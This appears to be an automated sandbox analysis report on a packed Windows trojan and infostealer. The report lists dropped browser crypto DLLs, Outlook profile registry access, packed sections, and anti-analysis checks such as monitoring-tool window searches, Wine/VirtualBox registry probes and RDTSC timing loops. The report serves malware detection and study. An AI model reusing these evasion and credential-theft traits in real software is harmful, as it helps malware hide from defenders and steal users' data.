Source: file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1885741313.0000000029A6C000.00000004.00000020.00020000.00000000.sdmp, EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFB8DB	0_2_00EFB8DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01211185	0_2_01211185
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA5172	0_2_00EA5172
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4D14D	0_2_00F4D14D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E35129	0_2_00E35129
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4328A	0_2_00F4328A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DFC26F	0_2_00DFC26F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4EB0C	0_2_00F4EB0C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F48CB3	0_2_00F48CB3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E76C7C	0_2_00E76C7C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E79412	0_2_00E79412
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA2DCE	0_2_00EA2DCE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F49D7A	0_2_00F49D7A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F44D53	0_2_00F44D53
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EED546	0_2_00EED546
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F156AE	0_2_00F156AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F24E57	0_2_00F24E57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F467FF	0_2_00F467FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F02F8C	0_2_00F02F8C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4B771	0_2_00F4B771

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00B845C0 appears 316 times

Source: file.exe, 00000000.00000002.1958707251.000000006C855000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1958844750.000000006F902000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: atrdupqr ZLIB complexity 0.9947546509197325

Source: file.exe, 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1707097418.0000000005000000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B98680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00B98680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B93720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00B93720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZQE35HRR.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1950194902.000000001D746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958599083.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958336475.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1950194902.000000001D746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958599083.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958336475.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1950194902.000000001D746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958599083.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958336475.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1950194902.000000001D746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958599083.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958336475.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1950194902.000000001D746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958599083.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958336475.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1950194902.000000001D746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958336475.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1950194902.000000001D746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958599083.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1958336475.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1802196383.000000001D644000.00000004.00000020.00020000.00000000.sdmp, CBFBGCGIJKJJKFIDBFCG.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1950194902.000000001D746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958336475.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1950194902.000000001D746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958336475.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1840128 > 1048576

Source: file.exe

Static PE information: Raw size of atrdupqr is bigger than: 0x100000 < 0x19b200

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1958804082.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1958599083.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1958599083.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1958804082.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.b80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;atrdupqr:EW;ycfcddne:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;atrdupqr:EW;ycfcddne:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B99860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00B99860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c2a1d should be: 0x1c4b8c

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: atrdupqr
Source: file.exe	Static PE information: section name: ycfcddne
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB80FC push ebx; mov dword ptr [esp], ecx	0_2_00FB8173
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F560FA push 4403424Bh; mov dword ptr [esp], esp	0_2_00F56129
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100591B push ecx; mov dword ptr [esp], 43F0E0D0h	0_2_01005A7A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD50E0 push ecx; mov dword ptr [esp], 7F4ADC56h	0_2_00FD5245
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD50E0 push edx; mov dword ptr [esp], ebp	0_2_00FD5317
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDB8C9 push esi; mov dword ptr [esp], edx	0_2_00EDB912
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDB8C9 push esi; mov dword ptr [esp], 608DC8E9h	0_2_00EDB916
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDB8C9 push ebx; mov dword ptr [esp], 77D76E5Ah	0_2_00EDB921
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFB8DB push ecx; mov dword ptr [esp], eax	0_2_00EFB8EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFB8DB push edx; mov dword ptr [esp], 7B425FCBh	0_2_00EFB940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFB8DB push 7AA429EEh; mov dword ptr [esp], ebp	0_2_00EFB9A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFB8DB push edx; mov dword ptr [esp], esi	0_2_00EFB9FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFB8DB push 23EA21A8h; mov dword ptr [esp], eax	0_2_00EFBB2E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFB8DB push eax; mov dword ptr [esp], ecx	0_2_00EFBBAF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9D094 push 2DECDEE4h; mov dword ptr [esp], eax	0_2_00F9D0BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF408D push 40F770E5h; mov dword ptr [esp], ecx	0_2_00FF40E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C171 push 161E76FEh; mov dword ptr [esp], ecx	0_2_0102C189
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C171 push esi; mov dword ptr [esp], 4D3F444Ch	0_2_0102C756
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101617C push 34C9A4C1h; mov dword ptr [esp], eax	0_2_010161C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101C98B push esi; mov dword ptr [esp], ebp	0_2_0101C9DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9B035 push ecx; ret	0_2_00B9B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100718E push 37B95466h; mov dword ptr [esp], ecx	0_2_01007223
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100718E push ebx; mov dword ptr [esp], ecx	0_2_01007276
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01211185 push edi; mov dword ptr [esp], esi	0_2_0121119F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01211185 push esi; mov dword ptr [esp], 44C949E7h	0_2_012111C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAE05C push eax; mov dword ptr [esp], ecx	0_2_00FADF73
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAA018 push 4B66A6F6h; mov dword ptr [esp], edx	0_2_00FAA036
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01064000 push ecx; mov dword ptr [esp], ebp	0_2_0106400D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01013819 push esi; mov dword ptr [esp], 7FEF1FD8h	0_2_010138F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0121103F push edi; mov dword ptr [esp], 0019C000h	0_2_0121107E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0121103F push edi; mov dword ptr [esp], ecx	0_2_0121109D

Source: file.exe

Static PE information: section name: atrdupqr entropy: 7.952671489318633

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00B99860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-13583

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5517B second address: F55188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 ja 00007F5344E6BF46h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F55476 second address: F554AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344B325FFh 0x00000007 jmp 00007F5344B32601h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5344B32601h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F554AE second address: F554B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5344E6BF46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5563E second address: F55658 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007F5344B325F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F5344B325FEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F55973 second address: F5598E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5344E6BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5344E6BF4Bh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F574A1 second address: F574A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F574A5 second address: F57509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5344E6BF4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5344E6BF53h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007F5344E6BF4Eh 0x00000019 jmp 00007F5344E6BF53h 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F5344E6BF52h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F577AF second address: F577B9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5344B325FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F577B9 second address: F577C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F577C8 second address: F577CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F577CC second address: F577D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F577D6 second address: F577DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F577DA second address: F577F8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5344E6BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5344E6BF4Eh 0x00000015 rdtsc
